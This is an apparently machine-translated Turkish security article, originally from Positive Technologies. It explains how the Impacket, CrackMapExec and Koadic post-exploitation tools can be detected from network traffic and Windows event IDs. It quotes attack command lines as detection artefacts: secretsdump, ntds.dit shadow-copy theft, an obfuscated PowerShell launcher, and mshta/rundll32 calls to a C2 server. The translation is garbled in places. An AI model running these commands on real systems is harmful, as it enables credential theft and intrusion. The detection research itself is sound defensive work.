Kurumsal sektöre yönelik saldırıların sayısı her yıl artıyor: örneğin 2016'ya göre ve 2018'in sonunda - önceki döneme göre. Ana çalışma aracının Windows işletim sistemi olduğu yerler dahil. 2017-2018'de APT Dragonfly, APT28, Avrupa, Kuzey Amerika ve Suudi Arabistan'da hükümet ve askeri kuruluşlara saldırılar gerçekleştirdi. Bunun için üç araç kullandık: , и . Kaynak kodları GitHub'da açık ve mevcuttur.
Bu araçların ilk penetrasyon için değil, altyapı içerisinde bir saldırı geliştirmek için kullanıldığını belirtmekte fayda var. Saldırganlar, çevreyi deldikten sonra saldırının farklı aşamalarında bunları kullanır. Bu arada, bunu tespit etmek zordur ve genellikle yalnızca teknolojinin yardımıyla veya izin veren araçlar . Araçlar, dosyaların aktarılmasından kayıt defteriyle etkileşime girmeye ve uzak makinede komutların yürütülmesine kadar çeşitli işlevler sağlar. Ağ aktivitelerini belirlemek için bu araçlar üzerinde bir çalışma yaptık.
Yapmamız gerekenler:
- Bilgisayar korsanlığı araçlarının nasıl çalıştığını anlayın. Saldırganların nelerden yararlanmaları gerektiğini ve hangi teknolojileri kullanabileceklerini öğrenin.
- Bir saldırının ilk aşamalarında bilgi güvenliği araçlarının tespit edemediklerini bulun. Saldırganın dahili bir saldırgan olması veya saldırganın altyapıdaki daha önce bilinmeyen bir açıktan yararlanması nedeniyle keşif aşaması atlanabilir. Eylemlerinin tüm zincirini, dolayısıyla daha fazla hareketi tespit etme arzusunu eski haline getirmek mümkün hale gelir.
- İzinsiz giriş tespit araçlarından yanlış pozitifleri ortadan kaldırın. Bazı eylemlerin yalnızca keşif yoluyla tespit edilmesi durumunda sık sık hata yapılmasının mümkün olduğunu unutmamalıyız. Genellikle altyapıda, herhangi bir bilgiyi elde etmek için ilk bakışta yasal olanlardan ayırt edilemeyen yeterli sayıda yol vardır.
Bu araçlar saldırganlara ne sağlıyor? Eğer bu Impacket ise, saldırganlar, çevreyi kırdıktan sonraki saldırının farklı aşamalarında kullanılabilecek geniş bir modül kitaplığı alırlar. Birçok araç Impacket modüllerini dahili olarak kullanır - örneğin Metasploit. Uzaktan komut yürütmek için dcomexec ve wmiexec'e, Impacket'ten eklenen hesapları bellekten almak için secretsdump'a sahiptir. Sonuç olarak böyle bir kütüphanenin aktivitesinin doğru tespiti türevlerin tespitini sağlayacaktır.
İçerik oluşturucuların CrackMapExec (veya kısaca CME) hakkında "Powered by Impacket" yazmaları tesadüf değildir. Ek olarak CME, popüler senaryolar için hazır işlevselliğe sahiptir: Parolaları veya karmalarını elde etmek için Mimikatz, uzaktan yürütme için Meterpreter veya Empire aracısının uygulanması ve yerleşik Bloodhound.
Seçtiğimiz üçüncü araç Koadic'ti. Oldukça yenidir, 25 yılında uluslararası hacker konferansı DEFCON 2017'te sunulmuştur ve standart dışı bir yaklaşımla öne çıkmaktadır: HTTP, Java Script ve Microsoft Visual Basic Script (VBS) aracılığıyla çalışır. Bu yaklaşıma araziden yaşamak denir: araç, Windows'ta yerleşik bir dizi bağımlılık ve kitaplık kullanır. Yaratıcılar buna COM Komuta ve Kontrol veya C3 adını veriyor.
ETKİ PAKETİ
Impacket'in işlevselliği, AD içinde keşif yapmaktan ve dahili MS SQL sunucularından veri toplamaktan, kimlik bilgileri elde etme tekniklerine kadar çok geniş bir yelpazeye sahiptir: bu bir SMB geçiş saldırısıdır ve bir etki alanı denetleyicisinden kullanıcı parolalarının karmalarını içeren ntds.dit dosyasını elde eder. Impacket ayrıca komutları dört farklı yöntemi kullanarak uzaktan yürütür: WMI, Windows Zamanlayıcı Yönetim Hizmeti, DCOM ve SMB ve bunu yapmak için kimlik bilgileri gerekir.
Sırlar dökümü
Secretsdump'a bir göz atalım. Hem kullanıcı makinelerini hem de etki alanı denetleyicilerini hedefleyebilen bir modüldür. LSA, SAM, SECURITY, NTDS.dit hafıza alanlarının kopyalarını almak için kullanılabilir, böylece saldırının farklı aşamalarında görülebilir. Modülün işleyişindeki ilk adım, Pass the Hash saldırısını otomatik olarak gerçekleştirmek için kullanıcının şifresini veya karmasını gerektiren SMB aracılığıyla kimlik doğrulamadır. Ardından, Hizmet Kontrol Yöneticisine (SCM) erişimin açılması ve winreg protokolü aracılığıyla kayıt defterine erişim sağlanması talebi gelir; bu protokol kullanılarak saldırgan, ilgilenilen dalların verilerini bulabilir ve SMB aracılığıyla sonuçlar alabilir.
İncirde. Şekil 1'de winreg protokolünü kullanırken LSA'lı bir kayıt defteri anahtarı kullanılarak erişimin tam olarak nasıl elde edildiğini görüyoruz. Bunu yapmak için DCERPC komutunu 15 - OpenKey işlem koduyla kullanın.
Pirinç. 1. Winreg protokolünü kullanarak bir kayıt defteri anahtarı açma
Daha sonra anahtara erişim sağlandığında değerler SaveKey komutu ile opcode 20 ile kaydedilir. Impacket bunu çok spesifik bir şekilde yapar. Değerleri, adı .tmp ile eklenen 8 rastgele karakterden oluşan bir dize olan bir dosyaya kaydeder. Ek olarak, bu dosyanın daha fazla yüklenmesi System32 dizininden SMB aracılığıyla gerçekleşir (Şekil 2).
Pirinç. 2. Uzak makineden kayıt defteri anahtarı alma şeması
Ağdaki bu tür etkinliklerin, winreg protokolü, belirli adlar, komutlar ve bunların sırası kullanılarak belirli kayıt defteri dallarına yapılan sorgularla tespit edilebildiği ortaya çıktı.
Bu modül ayrıca Windows olay günlüğünde izler bırakarak tespit edilmesini kolaylaştırır. Örneğin, komutun yürütülmesinin bir sonucu olarak
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCWindows Server 2016 günlüğünde aşağıdaki önemli olay dizisini göreceğiz:
1. 4624 - uzaktan Oturum Açma.
2. 5145 - winreg uzaktan hizmetine erişim haklarının kontrol edilmesi.
3. 5145 - System32 dizinindeki dosya erişim haklarının kontrol edilmesi. Dosya yukarıda belirtilen rastgele isme sahiptir.
4. 4688 - vssadmin'i başlatan bir cmd.exe işlemi oluşturma:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - şu komutla bir işlem oluşturma:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - şu komutla bir işlem oluşturma:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - şu komutla bir işlem oluşturma:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Birçok kullanım sonrası araç gibi Impacket'in de komutları uzaktan yürütmek için modülleri vardır. Uzak makinede etkileşimli bir komut kabuğu sağlayan smbexec'e odaklanacağız. Bu modül ayrıca bir parola veya parola karması ile SMB aracılığıyla kimlik doğrulaması gerektirir. İncirde. Şekil 3'te böyle bir aracın nasıl çalıştığına dair bir örnek görüyoruz; bu durumda bu, yerel yönetici konsoludur.
Pirinç. 3. Etkileşimli smbexec konsolu
Kimlik doğrulamadan sonra smbexec'in ilk adımı SCM'yi OpenSCManagerW komutuyla açmaktır (15). Sorgu dikkat çekicidir: MakineAdı alanı DUMMY'dir.
Pirinç. 4. Hizmet Kontrol Yöneticisini açma isteği
Daha sonra, CreateServiceW komutu (12) kullanılarak hizmet oluşturulur. Smbexec durumunda her zaman aynı komut yapım mantığını görebiliriz. İncirde. 5 yeşil, değiştirilemeyen komut parametrelerini, sarı ise saldırganın neyi değiştirebileceğini gösterir. Yürütülebilir dosyanın adının, dizininin ve çıktı dosyasının değiştirilebileceğini görmek kolaydır, ancak geri kalanını Impacket modülünün mantığını bozmadan değiştirmek çok daha zordur.
Pirinç. 5. Hizmet Kontrol Yöneticisini kullanarak hizmet oluşturma isteği
Smbexec ayrıca Windows olay günlüğünde belirgin izler bırakır. ipconfig komutunu içeren etkileşimli komut kabuğunun Windows Server 2016 günlüğünde aşağıdaki önemli olay dizisini göreceğiz:
1. 4697 — hizmetin kurbanın makinesine kurulması:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - 1. maddedeki argümanlarla cmd.exe işleminin oluşturulması.
3. 5145 - C$ dizinindeki __output dosyasına erişim hakları kontrol ediliyor.
4. 4697 — hizmetin mağdurun makinesine kurulması.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - 4. maddedeki argümanlarla cmd.exe işleminin oluşturulması.
6. 5145 - C$ dizinindeki __output dosyasına erişim hakları kontrol ediliyor.
Impacket, saldırı araçlarının geliştirilmesinin temelidir. Windows altyapısındaki hemen hemen tüm protokolleri destekler ve aynı zamanda kendine has karakteristik özelliklere sahiptir. Burada belirli winreg istekleri, karakteristik komut oluşumuyla SCM API'nin kullanımı, dosya adı formatı ve SMB paylaşımı SYSTEM32 yer almaktadır.
CRACKMAPEXEC
CME aracı öncelikle bir saldırganın ağ içinde ilerlemek için gerçekleştirmesi gereken rutin eylemleri otomatikleştirmek için tasarlanmıştır. Tanınmış Empire ajanı ve Meterpreter ile birlikte çalışmanıza olanak tanır. Komutları gizlice yürütmek için CME bunları gizleyebilir. Saldırgan, Bloodhound'u (ayrı bir keşif aracı) kullanarak, etkin bir etki alanı yöneticisi oturumu aramasını otomatikleştirebilir.
Tazı
Bloodhound, bağımsız bir araç olarak ağ içinde gelişmiş keşif yapılmasına olanak tanır. Kullanıcılar, makineler, gruplar, oturumlar hakkında veri toplar ve PowerShell betiği veya ikili dosya olarak sağlanır. Bilgi toplamak için LDAP veya SMB tabanlı protokoller kullanılır. CME entegrasyon modülü Bloodhound'un kurbanın makinesine indirilmesine, çalıştırılmasına ve yürütme sonrasında toplanan verileri almasına olanak tanır, böylece sistemdeki eylemleri otomatikleştirir ve daha az fark edilir hale getirir. Bloodhound grafik kabuğu, toplanan verileri grafikler biçiminde sunarak saldırganın makinesinden etki alanı yöneticisine giden en kısa yolu bulmanızı sağlar.
Pirinç. 6. Bloodhound Arayüzü
Modül, kurbanın makinesinde çalışmak için ATSVC ve SMB'yi kullanarak bir görev oluşturur. ATSVC, Windows Görev Zamanlayıcı ile çalışmaya yönelik bir arayüzdür. CME, ağ üzerinden görevler oluşturmak için NetrJobAdd(1) işlevini kullanır. CME modülünün gönderdiği şeyin bir örneği Şekil 7'de gösterilmektedir. XNUMX: Bu bir cmd.exe komut çağrısıdır ve XML formatında argümanlar biçiminde gizlenmiş koddur.
Şekil 7. CME aracılığıyla görev oluşturma
Görev yürütülmek üzere gönderildikten sonra kurbanın makinesi Bloodhound'u kendisi başlatıyor ve bu durum trafikte de görülebiliyor. Modül, standart grupları, etki alanındaki tüm makinelerin ve kullanıcıların bir listesini elde etmek ve SRVSVC NetSessEnum isteği aracılığıyla aktif kullanıcı oturumları hakkında bilgi edinmek için LDAP sorgularıyla karakterize edilir.
Pirinç. 8. SMB aracılığıyla aktif oturumların listesinin alınması
Ek olarak, Bloodhound'un kurbanın makinesinde denetim etkinken başlatılmasına, 4688 kimliğine (işlem oluşturma) ve işlem adına sahip bir olay eşlik eder. «C:WindowsSystem32cmd.exe». Bu konuda dikkate değer olan şey komut satırı argümanlarıdır:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "Enum_avproducts
enum_avproducts modülü işlevsellik ve uygulama açısından oldukça ilgi çekicidir. WMI, çeşitli Windows nesnelerinden veri almak için WQL sorgu dilini kullanmanıza olanak tanır; bu, esasen bu CME modülünün kullandığı şeydir. Mağdurun makinesinde yüklü olan koruma araçları hakkında AntiSpywareProduct ve AntiМirusProduct sınıflarına sorgular oluşturur. Gerekli verileri elde etmek için modül rootSecurityCenter2 ad alanına bağlanır, ardından bir WQL sorgusu oluşturur ve bir yanıt alır. İncirde. Şekil 9'da bu tür istek ve yanıtların içerikleri gösterilmektedir. Örneğimizde Windows Defender bulundu.
Pirinç. 9. enum_avproducts modülünün ağ etkinliği
Çoğu zaman, etkinliklerinde WQL sorguları hakkında yararlı bilgiler bulabileceğiniz WMI denetimi (Trace WMI-Activity) devre dışı bırakılabilir. Ancak etkinleştirilirse, enum_avproducts betiği çalıştırılırsa, ID 11'e sahip bir olay kaydedilecektir.Bu olay, isteği gönderen kullanıcının adını ve rootSecurityCenter2 ad alanındaki adı içerecektir.
CME modüllerinin her birinin, belirli WQL sorguları veya LDAP ve SMB'de şaşırtma ve Bloodhound'a özgü aktivite ile bir görev zamanlayıcıda belirli bir görev türünün oluşturulması gibi kendi yapıtları vardı.
KOADİK
Koadic'in ayırt edici bir özelliği, Windows'ta yerleşik olarak bulunan JavaScript ve VBScript yorumlayıcılarının kullanılmasıdır. Bu anlamda topraktan geçinme trendini takip ediyor, yani dışarıya bağımlılığı yok ve standart Windows araçlarını kullanıyor. Bu tam Komuta ve Kontrol (CnC) amaçlı bir araçtır, çünkü enfeksiyondan sonra makineye kontrol edilmesini sağlayan bir "implant" takılır. Böyle bir makineye Koadic terminolojisinde "zombi" denir. Kurban tarafında tam işlem için yeterli ayrıcalık yoksa Koadic, kullanıcı hesabı kontrolünü atlama tekniklerini (UAC atlama) kullanarak bunları yükseltme olanağına sahiptir.
Pirinç. 10. Koadik Kabuk
Mağdurun Komuta ve Kontrol sunucusuyla iletişimi başlatması gerekir. Bunu yapmak için önceden hazırlanmış bir URI ile iletişime geçmesi ve aşamalardan birini kullanarak ana Koadic gövdesini alması gerekiyor. İncirde. Şekil 11'de mshta aşamalandırıcının bir örneği gösterilmektedir.
Pirinç. 11. CnC sunucusuyla bir oturumun başlatılması
Yanıt değişkeni WS'ye dayanarak, yürütmenin WScript.Shell aracılığıyla gerçekleştiği ve STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE değişkenlerinin geçerli oturumun parametreleri hakkında önemli bilgiler içerdiği açıkça ortaya çıkıyor. Bu, bir CnC sunucusuyla HTTP bağlantısındaki ilk istek-yanıt çiftidir. Daha sonraki talepler doğrudan çağrılan modüllerin (implantların) işlevselliği ile ilgilidir. Tüm Koadic modülleri yalnızca CnC ile aktif bir oturumda çalışır.
Mimikatz
CME'nin Bloodhound ile çalıştığı gibi Koadic de Mimikatz ile ayrı bir program olarak çalışır ve onu başlatmanın birden fazla yolu vardır. Aşağıda Mimikatz implantını indirmek için bir istek-yanıt çifti bulunmaktadır.
Pirinç. 12. Mimikatz'ı Koadic'e transfer edin
İstekteki URI formatının nasıl değiştiğini görebilirsiniz. Artık seçilen modülden sorumlu olan csrf değişkeni için bir değer içeriyor. Adına dikkat etmeyin; CSRF'nin genellikle farklı anlaşıldığını hepimiz biliyoruz. Yanıt, Mimikatz ile ilgili kodun eklendiği Koadic'in aynı ana gövdesiydi. Oldukça büyük, o yüzden kilit noktalara bakalım. Burada base64'te kodlanmış Mimikatz kitaplığı, onu enjekte edecek serileştirilmiş bir .NET sınıfı ve Mimikatz'ı başlatmak için argümanlar var. Yürütme sonucu ağ üzerinden açık metin olarak iletilir.
Pirinç. 13. Mimikatz'ı uzaktaki bir makinede çalıştırmanın sonucu
Exec_cmd
Koadic ayrıca komutları uzaktan çalıştırabilen modüllere de sahiptir. Burada aynı URI oluşturma yöntemini ve tanıdık sid ve csrf değişkenlerini göreceğiz. exec_cmd modülü durumunda, gövdeye kabuk komutlarını yürütebilecek kod eklenir. Aşağıda CnC sunucusunun HTTP yanıtında bulunan kod gösterilmektedir.
Pirinç. 14. İmplant kodu exec_cmd
Tanıdık WS özniteliğine sahip GAWTUUGCFI değişkeni, kod yürütme için gereklidir. İmplant, onun yardımıyla kabuğu çağırır ve kodun iki dalını işler - çıkış veri akışının geri dönüşüyle shell.exec ve geri dönmeden Shell.run.
Koadic tipik bir araç değildir ancak yasal trafikte bulunabilmesini sağlayan kendine has yapıları vardır:
- HTTP isteklerinin özel oluşumu,
- winHttpRequests API'sini kullanarak,
- ActiveXObject aracılığıyla bir WScript.Shell nesnesi oluşturma,
- büyük yürütülebilir gövde.
İlk bağlantı, aşamalandırıcı tarafından başlatılır, dolayısıyla etkinliğini Windows olayları aracılığıyla tespit etmek mümkündür. Mshta için bu, start özniteliğine sahip bir işlemin oluşturulduğunu gösteren olay 4688'dir:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Koadic çalışırken, onu mükemmel şekilde karakterize eden özelliklere sahip diğer 4688 olayı görebilirsiniz:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1Bulgular
Araziden yaşama eğilimi suçlular arasında popülerlik kazanıyor. İhtiyaçları doğrultusunda Windows'un yerleşik araç ve mekanizmalarını kullanırlar. Bu prensibi takip eden popüler Koadic, CrackMapExec ve Impacket araçlarının APT raporlarında giderek daha fazla yer aldığını görüyoruz. Bu araçlar için GitHub'daki çatalların sayısı da artıyor ve yenileri ortaya çıkıyor (şu anda bunlardan yaklaşık bin tane var). Trend, basitliği nedeniyle popülerlik kazanıyor: Saldırganlar üçüncü taraf araçlara ihtiyaç duymuyor; zaten kurbanların makinelerinde bulunuyorlar ve güvenlik önlemlerini atlamalarına yardımcı oluyorlar. Ağ iletişimini incelemeye odaklanıyoruz: yukarıda açıklanan her araç ağ trafiğinde kendi izlerini bırakır; bunların detaylı incelenmesi ürünümüzü öğretmemize olanak sağladı onları tespit eder ve bu da sonuçta onları içeren siber olaylar zincirinin tamamının araştırılmasına yardımcı olur.
Yazarlar:
- Anton Tyurin, Uzman Hizmetler Departmanı Başkanı, PT Uzman Güvenlik Merkezi, Positive Technologies
- Egor Podmokov, uzman, PT Uzman Güvenlik Merkezi, Pozitif Teknolojiler
Kaynak: habr.com